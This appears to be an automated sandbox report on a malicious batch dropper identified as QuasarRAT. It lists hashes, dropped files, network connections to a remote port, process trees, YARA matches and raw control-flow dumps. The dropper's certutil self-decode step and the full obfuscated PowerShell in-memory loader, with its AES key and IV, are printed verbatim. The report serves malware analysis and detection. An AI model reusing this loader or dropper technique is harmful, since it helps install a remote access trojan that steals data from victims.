                                                                      SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                                                                      SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1
                                                                      Process:C:\Windows\System32\certutil.exe
                                                                      File Type:DOS batch file, ASCII text, with very long lines (59710), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1656310
                                                                      Entropy (8bit):6.015691015837739
                                                                      Encrypted:false
                                                                      SSDEEP:24576:2XSg2xeZeRalJecyKKAkS7Nr2C5Uz7yYmdAC8cywn+H8b/7KdxinkWrrMt:QSFQlC+92kKMh+yQRr
                                                                      MD5:EAE03E33CC6A6DA5B23F9508133E453C
                                                                      SHA1:1BEF2A1688C72A0A29B6CA6D378D57BB718DBBB7
                                                                      SHA-256:5642778FEF03F7E81A81BB97A3C33D0B569479C65B556EB1CDAE50108BBC8A14
                                                                      SHA-512:95A20A2A89D5910B0FABBCC0B96FCDFCC34BA226D076E17F65DBF7AED0C7FB1DBE7819FE1EEE3265ED1988F1075F614701B2195E65ABA9575D8E810DC29302D1
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      Preview:@echo off..set "FVGr=set "..%FVGr%"diFAUFtRMb=st"..%FVGr%"HYrJXVYKMt=\v"..%FVGr%"yTBTwAtjPl=rs"..%FVGr%"JrIRTfruLx=ll"..%FVGr%"AcCxjzbNLa=e""..%FVGr%"uimqsJPnna=ws"..%FVGr%"fskjreOFIf=xe"..%FVGr%"BGqwyrxSRT=y "..%FVGr%"RQIVpdMYql=s\"..%FVGr%"JZYSrIliaK=\W"..%FVGr%"pKmrDtKJRu=ow"..%FVGr%"jokylzBZud=po"..%FVGr%"dteNOHluqU=ex"..%FVGr%"JNfEJZoVMF=em"..%FVGr%"LJuCjkXTHo=he"..%FVGr%"NiiSpBZPeO=we"..%FVGr%"wGRWikxUyZ="%~0."..%FVGr%"SOXgWNFsbQ=do"..%FVGr%"OfUcUhdoKk=Po"..%FVGr%"yirSNeGyTS=1."..%FVGr%"XpRSEUcRWD=we"..%FVGr%"MDGcYykQUG=co"..%FVGr%"dSgkpBIVWS=rS"..%FVGr%"blAcMgKKLZ=Sy"..%FVGr%"pFjqvtxWZA=Wi"..%FVGr%"NulBLqNrbK=.e"..%FVGr%"DfiQlRPLOE= /"..%FVGr%"CHdPeSYMSs=ll"..%FVGr%"JWoMEzizDC= C"..%FVGr%"dAMuPrdcZj=:\"..%FVGr%"KVlpBngVtN=in"..%FVGr%"xSIsYMTVlO=he"..%FVGr%"dpDmydkkFw=32"..%FVGr%"UwdGMUTIeF=py"..%FVGr%"QXQbIPoUxz=nd"..%FVGr%"bhFhUMkpqk=0\"..set "GpeR=set "..%GpeR%"tYMoAFPNXc=cd"..%GpeR%"XygUUDuQwo= "%~dp0""..set "AZSJ=set "..%AZSJ%"wObaReDTXA=GD);"..%AZSJ%"qWkGXtcWHU=Secu"..%AZSJ
                                                                      Process:C:\Windows\System32\cmd.exe
                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):447488
                                                                      Entropy (8bit):5.440627434620499
                                                                      Encrypted:false
                                                                      SSDEEP:6144:f1eapvqlkiMWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:NzW2KXzJ4pdd3klnnWosPhnzq
                                                                      MD5:95000560239032BC68B4C2FDFCDEF913
                                                                      SHA1:1B3B40FBC889FD4C645CC12C85D0805AC36BA254
                                                                      SHA-256:D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
                                                                      SHA-512:F990F72F4D90CE49F7A44DA0C0CDD82D56A7DC7461E073646ACFD448379B2ADEFD6E29FB2A596A9C8819DE53FA709905C98007B70DD4CF98569373013E42EE49
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: KqB3s5B5BI.exe, Detection: malicious, Browse
                                                                      • Filename: allah.bat, Detection: malicious, Browse
                                                                      • Filename: 5hhAqfqkLs.exe, Detection: malicious, Browse
                                                                      • Filename: 5hhAqfqkLs.exe, Detection: malicious, Browse
                                                                      • Filename: UI721.bin.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.IL.Trojan.MSILZilla.20149.21390.6577.exe, Detection: malicious, Browse
                                                                      • Filename: Invoice_6238829.bat, Detection: malicious, Browse
                                                                      • Filename: 1.bat, Detection: malicious, Browse
                                                                      • Filename: beampredictor.bat, Detection: malicious, Browse
                                                                      • Filename: c.cmd, Detection: malicious, Browse
                                                                      • Filename: SEQ833Ufdl.exe, Detection: malicious, Browse
                                                                      • Filename: 5rIuV7bm6g.exe, Detection: malicious, Browse
                                                                      • Filename: update.bat, Detection: malicious, Browse
                                                                      • Filename: Aktar#U0131m_kopyas#U0131.bat, Detection: malicious, Browse
                                                                      • Filename: Remittance_slip.bat, Detection: malicious, Browse
                                                                      • Filename: payload1.dll.exe, Detection: malicious, Browse
                                                                      • Filename: umuJhqgUNH.exe, Detection: malicious, Browse
                                                                      • Filename: Setup.bat, Detection: malicious, Browse
                                                                      • Filename: Parts and Inquiry.bat, Detection: malicious, Browse
                                                                      • Filename: loder.bat, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................G.......G.............................................+...........Rich............................PE..d....)............"..........P...... 2.........@..........................................`.......... ......................................|@.......p...}...`..................0...P...T.......................(....................................................text.............................. ..`.rdata..............................@..@.data...8....P.......<..............@....pdata.......`.......B..............@..@.rsrc....}...p...~...L..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\certutil.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):100
                                                                      Entropy (8bit):4.859079570624175
                                                                      Encrypted:false
                                                                      SSDEEP:3:qOYFXXmxNVEM+YFUiWUSRwqRF8jxd1ELzdUA2AGN8cv:q3lUdnuiW9gxILxUANGN8e
                                                                      MD5:FA1FF6A8138C97A5B875A45881B15AC1
                                                                      SHA1:09BC1EE3F39C5A4B2DD9CB8B5AC853E0E277FECE
                                                                      SHA-256:C3BE4668A60432076884B0ECC8941E2C9F016813ABEBFB9BE0ADDC3376C60E96
                                                                      SHA-512:415A63EFB1E304DBF1D6B5035AB6024C7932051EF7638BE75A4AD0E9163A4959703C0F3A4AAA019F7C2531BA4F1A17FDCBE7FAE13FDB1131D3B99D289853D975
                                                                      Malicious:false
                                                                      Preview:Input Length = 2277691..Output Length = 1656310..CertUtil: -decode command completed successfully...
                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                                                      Entropy (8bit):5.697442564532801
                                                                      TrID:
                                                                      • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                                                      • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                                                      • MP3 audio (1001/1) 18.19%
                                                                      File name:deneme.bat
                                                                      File size:2277691
                                                                      MD5:140518164b4e215675accd37cae0d91f
                                                                      SHA1:605f1798f9b54b245e35ea516c6e3818463953a7
                                                                      SHA256:3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
                                                                      SHA512:a0210e5147d4e1cda815d4cab29a82f1dd221fd43456d4d9a18ebe1761c90aa31d48f7aca111510dedb2001ef125fb8226634aa3db7fcbfca57a7d5f389a8052
                                                                      SSDEEP:24576:dr8+hKEEFki/cKQSMavHgz6kMtQCJQ5HT0/xBBX0T+DewGEpwERNey20cUIz9Chg:dryEE7kMRy+DeOFYT0hTg+js
                                                                      TLSH:1CB5022541983FE9CB58673CF079320E57F4158B4A65628EAB63EE06BFF6C080D274B5
                                                                      File Content Preview:..&cls..@echo off ..Title %~n0..Mode 60,3 ..color 0B..echo(..echo Please wait... a while Loading data ......CERTUTIL -f -decode "%~f0" "%Temp%\allah.bat" >nul 2>&1 ..cls.."%Temp%\allah.bat"..Exit..-----BEGIN CERTIFICATE-----..QGVjaG8gb2ZmDQpzZXQgI
                                                                      Icon Hash:9686878b929a9886
                                                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                                                      May 28, 2023 09:35:08.256187916 CEST  49702        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:11.263130903 CEST  49702        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:17.263669014 CEST  49702        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:32.719080925 CEST  49703        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:35.718307972 CEST  49703        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:41.722459078 CEST  49703        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:35:57.330818892 CEST  49704        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:00.345535040 CEST  49704        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:06.361524105 CEST  49704        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:21.668445110 CEST  49705        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:24.683211088 CEST  49705        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:30.683803082 CEST  49705        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:46.357554913 CEST  49706        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:49.372786045 CEST  49706        3131       192.168.2.3  74.234.104.236
                                                                      May 28, 2023 09:36:55.389588118 CEST  49706        3131       192.168.2.3  74.234.104.236

                                                                      Target ID:0
                                                                      Start time:09:34:49
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
                                                                      Imagebase:0x7ff707bb0000
                                                                      File size:273920 bytes
                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:1
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff745070000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:2
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\mode.com
                                                                      Wow64 process (32bit):false
                                                                      Commandline:Mode 60,3
                                                                      Imagebase:0x7ff6c3520000
                                                                      File size:31232 bytes
                                                                      MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Target ID:3
                                                                      Start time:09:34:50
                                                                      Start date:28/05/2023
                                                                      Path:C:\Windows\System32\certutil.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
                                                                      Imagebase:0x7ff70d710000
                                                                      File size:1557504 bytes
                                                                      MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Target ID:4
                                                                      Start time:09:34:52
                                                                      Start date:28/05/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
                                                                      Imagebase:0x7ff7eb5b0000
                                                                      File size:447488 bytes
                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekshen
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal
                                                                      Reputation:high

                                                                        Execution Graph

                                                                        Execution Coverage:11.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:33.3%
                                                                        Total number of Nodes:9
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 15402 7ffbac11acac 15403 7ffbac11acb5 VirtualProtect 15402->15403 15405 7ffbac11ad7b 15403->15405 15410 7ffbac11c88d 15411 7ffbac11c893 DeleteFileW 15410->15411 15413 7ffbac11ca16 15411->15413 15406 7ffbac11aa8a 15407 7ffbac11aa99 CheckRemoteDebuggerPresent 15406->15407 15409 7ffbac11ab73 15407->15409
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx$HJx$u)_H$Tx$gy$gy$gy$gy$gy
                                                                        • API String ID: 0-1403654266
                                                                        • Opcode ID: e1477256538717f6c6787f33944367a32aedad89e4b7a6da92d76fb8d1c48671
                                                                        • Instruction ID: 4d0f14a94c9bc2baaa4ef720faddcc3876f79fdf2facf544494dab363f7e3225
                                                                        • Opcode Fuzzy Hash: e1477256538717f6c6787f33944367a32aedad89e4b7a6da92d76fb8d1c48671
                                                                        • Instruction Fuzzy Hash: 7C03B5B0A09A598FDB95DF28C499BA97BF1FF59300F1441BAD44ED7292CA35EC42CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 882 7ffbac5a7f59-7ffbac5a7f9e 884 7ffbac5a7fa4-7ffbac5a7fb6 882->884 885 7ffbac5a851a-7ffbac5a8553 882->885 889 7ffbac5a84d5-7ffbac5a84e7 884->889 890 7ffbac5a7fbc-7ffbac5a7fd5 884->890 897 7ffbac5a8554-7ffbac5a85b6 885->897 890->889 893 7ffbac5a7fdb-7ffbac5a7fdf 890->893 895 7ffbac5a8003-7ffbac5a8080 893->895 896 7ffbac5a7fe1-7ffbac5a7fe5 893->896 907 7ffbac5a8086-7ffbac5a80b8 895->907 908 7ffbac5a817a-7ffbac5a8183 895->908 896->897 898 7ffbac5a7feb-7ffbac5a7ffd 896->898 904 7ffbac5a85b8-7ffbac5a85b9 897->904 905 7ffbac5a85bb-7ffbac5a85cd 897->905 898->889 898->895 904->905 913 7ffbac5a861d-7ffbac5a861e 905->913 914 7ffbac5a85cf-7ffbac5a85d7 905->914 907->889 930 7ffbac5a80be-7ffbac5a80c0 907->930 908->889 909 7ffbac5a8189-7ffbac5a81a3 908->909 915 7ffbac5a81a5-7ffbac5a81bb 909->915 916 7ffbac5a81c2-7ffbac5a8206 909->916 923 7ffbac5a8625-7ffbac5a862d 913->923 917 7ffbac5a85d9-7ffbac5a85dc 914->917 918 7ffbac5a8612-7ffbac5a8618 914->918 915->916 940 7ffbac5a820c-7ffbac5a8227 916->940 941 7ffbac5a84cf-7ffbac5a84d3 916->941 917->918 920 7ffbac5a85de-7ffbac5a860d 917->920 922 7ffbac5a8b23-7ffbac5a8b35 918->922 927 7ffbac5a8b36-7ffbac5a8b49 920->927 922->927 924 7ffbac5a8648-7ffbac5a864e 923->924 925 7ffbac5a862f-7ffbac5a8644 923->925 931 7ffbac5a8654-7ffbac5a8668 924->931 932 7ffbac5a8989-7ffbac5a8990 924->932 925->924 933 7ffbac5a80f3-7ffbac5a8174 930->933 934 7ffbac5a80c2-7ffbac5a80d2 930->934 931->932 935 7ffbac5a8997-7ffbac5a89a3 932->935 936 7ffbac5a8992-7ffbac5a8995 932->936 933->907 933->908 934->933 949 7ffbac5a80d4-7ffbac5a80da 934->949 939 7ffbac5a89a5-7ffbac5a89a8 935->939 936->939 945 7ffbac5a89b5-7ffbac5a89bd 939->945 946 7ffbac5a89aa-7ffbac5a89b0 939->946 953 7ffbac5a822d-7ffbac5a8232 940->953 954 7ffbac5a84c0-7ffbac5a84c9 940->954 941->889 942 7ffbac5a8506-7ffbac5a8519 941->942 950 7ffbac5a89c3-7ffbac5a89e0 945->950 951 7ffbac5a8b1d 945->951 946->927 957 
7ffbac5a80e1-7ffbac5a80ed 949->957 961 7ffbac5a8a07-7ffbac5a8a12 950->961 962 7ffbac5a89e2-7ffbac5a89f2 call 7ffbac5a75f0 950->962 951->922 959 7ffbac5a8234-7ffbac5a8245 953->959 960 7ffbac5a8247-7ffbac5a824c 953->960 954->940 954->941 957->889 957->933 959->959 959->960 963 7ffbac5a8462-7ffbac5a8467 960->963 964 7ffbac5a8252-7ffbac5a8259 960->964 968 7ffbac5a8a18-7ffbac5a8a1d 961->968 969 7ffbac5a8ad2-7ffbac5a8ad5 961->969 962->961 982 7ffbac5a89f4-7ffbac5a8a02 962->982 970 7ffbac5a8469-7ffbac5a8473 963->970 971 7ffbac5a84a8-7ffbac5a84be 963->971 966 7ffbac5a836a-7ffbac5a8372 964->966 967 7ffbac5a825f-7ffbac5a8269 964->967 976 7ffbac5a84f7-7ffbac5a8501 966->976 977 7ffbac5a8378-7ffbac5a83c6 966->977 974 7ffbac5a835e-7ffbac5a8368 967->974 975 7ffbac5a826f-7ffbac5a82bd 967->975 978 7ffbac5a8a24-7ffbac5a8a27 968->978 979 7ffbac5a8a1f 968->979 969->951 981 7ffbac5a8ad7-7ffbac5a8add 969->981 970->954 980 7ffbac5a8475-7ffbac5a8481 970->980 971->954 984 7ffbac5a8328-7ffbac5a833b 974->984 1000 7ffbac5a831a-7ffbac5a8326 975->1000 1001 7ffbac5a82bf-7ffbac5a8300 975->1001 983 7ffbac5a8444-7ffbac5a845c 976->983 1020 7ffbac5a83c8-7ffbac5a8409 977->1020 1021 7ffbac5a842e-7ffbac5a843e 977->1021 985 7ffbac5a8a29-7ffbac5a8a33 978->985 986 7ffbac5a8a37-7ffbac5a8a3a 978->986 979->978 980->897 987 7ffbac5a8487-7ffbac5a84a6 980->987 988 7ffbac5a8ae6 981->988 989 7ffbac5a8adf-7ffbac5a8ae4 981->989 982->961 983->963 983->966 990 7ffbac5a833d 984->990 991 7ffbac5a8342-7ffbac5a834a 984->991 985->986 995 7ffbac5a8a8a-7ffbac5a8a8d 986->995 996 7ffbac5a8a3c-7ffbac5a8a3f 986->996 987->970 987->971 992 7ffbac5a8aeb-7ffbac5a8b1b 988->992 989->992 990->963 991->967 992->927 998 7ffbac5a8a9a-7ffbac5a8a9f 995->998 999 7ffbac5a8a8f-7ffbac5a8a98 995->999 1002 7ffbac5a8a61-7ffbac5a8a64 996->1002 1003 7ffbac5a8a41-7ffbac5a8a4b 996->1003 1007 7ffbac5a8aa3-7ffbac5a8ab0 998->1007 999->1007 1000->984 1010 7ffbac5a834f-7ffbac5a8359 1000->1010 1001->1000 1027 7ffbac5a8302-7ffbac5a8316 1001->1027 1005 
7ffbac5a8a66-7ffbac5a8a6c 1002->1005 1006 7ffbac5a8a74-7ffbac5a8a7a 1002->1006 1009 7ffbac5a8a4c-7ffbac5a8a5b 1003->1009 1005->1006 1011 7ffbac5a8a6e-7ffbac5a8a71 1005->1011 1006->995 1012 7ffbac5a8a7c-7ffbac5a8a86 1006->1012 1007->1009 1016 7ffbac5a8ab2-7ffbac5a8ad0 1007->1016 1009->1002 1022 7ffbac5a8b4a-7ffbac5a8b59 1009->1022 1010->975 1011->1006 1012->995 1016->927 1020->1021 1030 7ffbac5a840b-7ffbac5a8412 1020->1030 1021->983 1023 7ffbac5a84e8-7ffbac5a84f2 1021->1023 1023->977 1027->1000 1030->897 1031 7ffbac5a8418-7ffbac5a842a 1030->1031 1031->1021
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$Tx
                                                                        • API String ID: 0-2169912402
                                                                        • Opcode ID: f18487f8b1836b06f2aba8754622e156a75ec8cce6247d40dc8164ab301dc2b0
                                                                        • Instruction ID: b92372df2d943beb2a145434ef9f285493dc63846c4982547bb5301e282f34bf
                                                                        • Opcode Fuzzy Hash: f18487f8b1836b06f2aba8754622e156a75ec8cce6247d40dc8164ab301dc2b0
                                                                        • Instruction Fuzzy Hash: 0152F3B0A1DA4A4FE759EA2DC44A679B7D1FF85310F14057EE88EC7292DE38E8428741
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1349 7ffbac5ad84c-7ffbac5ad86f 1352 7ffbac5ad89e-7ffbac5ad8a2 1349->1352 1353 7ffbac5ad871-7ffbac5ad898 1349->1353 1354 7ffbac5adad5-7ffbac5adae3 1352->1354 1355 7ffbac5ad8a8-7ffbac5ad8ad 1352->1355 1353->1352 1358 7ffbac5adb3a-7ffbac5adb51 1353->1358 1355->1354 1356 7ffbac5ad8b3-7ffbac5ad8bd 1355->1356 1360 7ffbac5ad924-7ffbac5ad929 1356->1360 1361 7ffbac5ad8bf-7ffbac5ad8d1 1356->1361 1370 7ffbac5adb53-7ffbac5adb59 1358->1370 1371 7ffbac5adb5d 1358->1371 1363 7ffbac5adab1-7ffbac5adab6 1360->1363 1364 7ffbac5ad92f-7ffbac5ad939 1360->1364 1361->1360 1369 7ffbac5ad8d3-7ffbac5ad917 1361->1369 1363->1354 1365 7ffbac5adab8-7ffbac5adacd 1363->1365 1364->1363 1373 7ffbac5ad93f-7ffbac5ad951 1364->1373 1365->1354 1378 7ffbac5adacf-7ffbac5adad2 1365->1378 1369->1360 1396 7ffbac5ad919-7ffbac5ad91d 1369->1396 1375 7ffbac5adb5b 1370->1375 1376 7ffbac5adb61-7ffbac5adbb8 1370->1376 1371->1376 1377 7ffbac5adb5f 1371->1377 1383 7ffbac5ada47-7ffbac5adaaa 1373->1383 1384 7ffbac5ad957-7ffbac5ad99c 1373->1384 1375->1371 1393 7ffbac5ae17a-7ffbac5ae18c 1376->1393 1394 7ffbac5adbbe-7ffbac5adbd0 1376->1394 1377->1376 1378->1354 1383->1363 1384->1383 1404 7ffbac5ad9a2-7ffbac5ada00 1384->1404 1394->1393 1400 7ffbac5adbd6-7ffbac5adc0f 1394->1400 1396->1360 1400->1393 1411 7ffbac5adc15-7ffbac5adc5b 1400->1411 1404->1383 1418 7ffbac5ada02-7ffbac5ada0d 1404->1418 1415 7ffbac5adc61-7ffbac5adc79 1411->1415 1416 7ffbac5add12-7ffbac5add25 1411->1416 1422 7ffbac5add06-7ffbac5add0c 1415->1422 1423 7ffbac5adc7f-7ffbac5adcb8 1415->1423 1424 7ffbac5add84 1416->1424 1425 7ffbac5add27-7ffbac5add4d 1416->1425 1426 7ffbac5ada2d-7ffbac5ada45 1418->1426 1427 7ffbac5ada0f-7ffbac5ada2b 1418->1427 1422->1415 1422->1416 1423->1422 1441 7ffbac5adcba-7ffbac5adcbe 1423->1441 1428 7ffbac5add86-7ffbac5add8b 1424->1428 1435 7ffbac5add7d-7ffbac5add82 1425->1435 1436 7ffbac5add4f-7ffbac5add7b 1425->1436 1426->1363 1427->1426 1430 
